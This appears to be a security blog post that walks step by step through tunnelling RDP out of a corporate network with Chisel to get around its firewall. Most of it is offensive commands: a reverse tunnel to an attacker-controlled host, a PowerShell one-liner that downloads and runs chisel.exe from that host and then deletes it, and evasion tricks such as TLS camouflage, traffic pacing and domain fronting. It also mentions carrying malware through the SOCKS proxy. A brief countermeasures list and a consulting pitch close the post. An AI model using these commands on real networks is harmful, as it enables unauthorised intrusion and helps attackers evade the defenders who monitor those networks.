Bypassing Corporate Firewalls with Chisel for RDP Access

 Scenario Overview:

A corporate network restricts inbound connections but allows outbound traffic (e.g., HTTP, HTTPS). We need to access an internal RDP (3389) server behind the firewall from an external attacker-controlled machine.

Constraints:

  • Firewall blocks inbound RDP, SSH, and VPN.

  • Only outbound HTTP/HTTPS is allowed.

  • Direct reverse shells are detected.

Sneaking in without getting caught, when it’s not allowed: Chisel (TCP/HTTP Tunneling)

Chisel creates an encrypted tunnel over allowed protocols (HTTP/WebSockets), bypassing firewall restrictions.

Step-by-Step Exploitation

1. Setup the Chisel Server (Attacker Machine)

On the attacker machine (public IP: 10.10.10.10), start the Chisel server in reverse mode (to allow victim-initiated connections):


  • Listens on port 8080 (HTTP-friendly to evade detection).

  • --reverse ensures ports are opened on the server (attacker) rather than the client (victim).


2. Victim Machine (Internal Network) Connects Back
On the internal Windows machine (behind firewall), run

./chisel client 10.10.10.10:8080 R:3389:localhost:3389


If you look at back to attacker machine, it starts to listen victim’s device:

We now have access to victim’s RDP connection. 
If we want to get “FULL” connection we can use SOCKS feature Chisel.

We can use proxy chain to use our own tools ( Or malware) in victim’s machine 
through the SOCS proxy.
To tho this, we’re using proxychains to tunnel nmap through the proxy 
so we scan the internal network.

As you can see, CHISEL is a very effective and stealthy tool 
to access restricted corporate networks
where there’s an active firewall rules that only allows outbound connections 
but no inbound connections, 
 where you may get detected if you use traditional techniques 
such as reverse shell access or aggressive scanning etc.

Advanced Evasion Techniques & Detection Methods for Chisel Tunneling

Evasion Techniques (Making Chisel Stealthier)

1. Protocol Camouflage

Chisel can tunnel over HTTP/HTTPS, WebSockets, or SSH, but deeper evasion is possible:


Use HTTPS Instead of Raw TCP:

./chisel server --host mylegitdomain.com --port 443 
--reverse --tls-key key.pem --tls-cert cert.pem

  • Hides within legitimate web traffic.
  • Requires a valid TLS certificate 
(can use Let’s Encrypt or self-signed if strict validation is absent).

2.WebSocket Tunneling (Less Noisy Than Raw TCP):
./chisel server -p 443 --reverse --proxy http://proxy.corp.com

Appears as normal WebSocket traffic (common in web apps, 
web socket is used where there’s live chat feature, 
or any other real time data transfered, 
especially in mission critical application features).

Traffic Obfuscation
  • Use --socks5 Instead of Raw Port Forwarding:
    • SOCKS5 is harder to distinguish from regular proxy traffic.
    • Many enterprises allow outbound SOCKS for internal tools.
  • Slow Down Traffic to Mimic Legitimate Patterns:
./chisel client 10.10.10.10:8080 R:3389:localhost:3389 --timeout 5s --keepalive 30s
  • Avoids bursty traffic patterns that trigger IDS alerts.

3. Fileless Execution (Avoiding Disk Writes)
Execute Chisel Directly in Memory:

iwr http://10.10.10.10/chisel.exe -OutFile $env:TEMP\chisel.exe; 
& $env:TEMP\chisel.exe client 10.10.10.10:8080 R:3389:localhost:3389

Delete immediately after execution:
rm $env:TEMP\chisel.exe -Force

4. Domain Fronting (If Cloud Services Are Allowed)
  • Route Traffic Through Legit CDNs (Cloudflare, Akamai):


    ./chisel server --host myrealcdn.cloudfront.net --port 443 --reverse

Countermeasures (Stopping Chisel in Enterprise Networks)
1. Network Hardening
  • Block Outbound Traffic to Uncommon Ports (8080, 4444, etc.).
  • Allow Only Whitelisted Domains (prevent callbacks to attacker servers).
2. Endpoint Controls
  • Restrict Unauthorized Executables (AppLocker/PowerShell Constrained Mode).
  • Monitor Temporary File Creation (C:\Windows\Temp\, $env:TEMP).
3. Behavioral Analysis
  • Alert on Rapid Succession of Network Connections (Chisel heartbeat traffic).
  • Detect Local Port Forwarding (e.g., netsh interface portproxy).

A comprehensive protection requires layered security controls. For organizations needing tailored defense solutions, I offer:
Enterprise-Grade Countermeasures 
  1. Custom Network Traffic Profiling
    • Behavioral analysis of encrypted HTTP/WebSocket traffic
    • Machine learning models tuned to organization’s specific environment
  2. Active Counter-Tunneling Systems
    • Real-time tunnel disruption technology
    • Protocol-level interference for unauthorized proxies
  3. Hardened Endpoint Protection
    • Memory-based execution monitoring
    • Weaponized decoy tunnels for attacker identification
  4. Live Threat Hunting
    • 24/7 SOC monitoring for tunnel artifacts
    • Attack surface reduction through micro segmentation

Comments

Post a Comment

Popular posts from this blog

Data Poisoning: A Technical Deep Dive into AI's Most Insidious Threat

Image
Artificial Intelligence and Machine Learning (AI/ML) models are rapidly becoming the bedrock of modern business operations, I had opportunity to do security assignments with AI features in different companies and I I also made lots of research and investigation, and chance to do tinkering on computer and ML models, to find more and more ways to hack these models. The whole AI thing is actually simply relying on DATA. The way it works with data is heavily relying on mathematical concepts where Prediction, Probability, discrete math, calculus, etc. But we don’t need any of these. What we want is DATA. Before hacking anything, you should first learn how it works. AI models reliance on DATA for it’s core functionality makes it vulnerable to a subtle, and devastating attack vector: data poisoning . There are other attack vectors as well, but I want to focus on DATA POISONING Technique in this text, since it’s one of the biggest attack vectors and it’s also the most difficult to secure compl...
Read more

Is a bad lock on a door better than no lock at all?

Image
  Bad controls can increase the attack surface significantly, compared to not having controls at all. A minimal physical barrier might offer a sliver of deterrence, poorly implemented security controls can significantly increase the attack surface compared to having no controls at all. This is because flawed controls can introduce new vulnerabilities and provide a false sense of security, making systems more susceptible to exploitation. Poorly implemented authentication might introduce bypass vulnerabilities, effectively opening up access points that wouldn't exist without it. A flawed encryption mechanism could provide a false sense of data protection while actually being easily broken, making sensitive information more readily available to attackers than if it were unencrypted but its vulnerability was known. I've seen companies that implemented an encryption mechanism, believing they had addressed security. The critical oversight was that their chosen encryption method was ...
Read more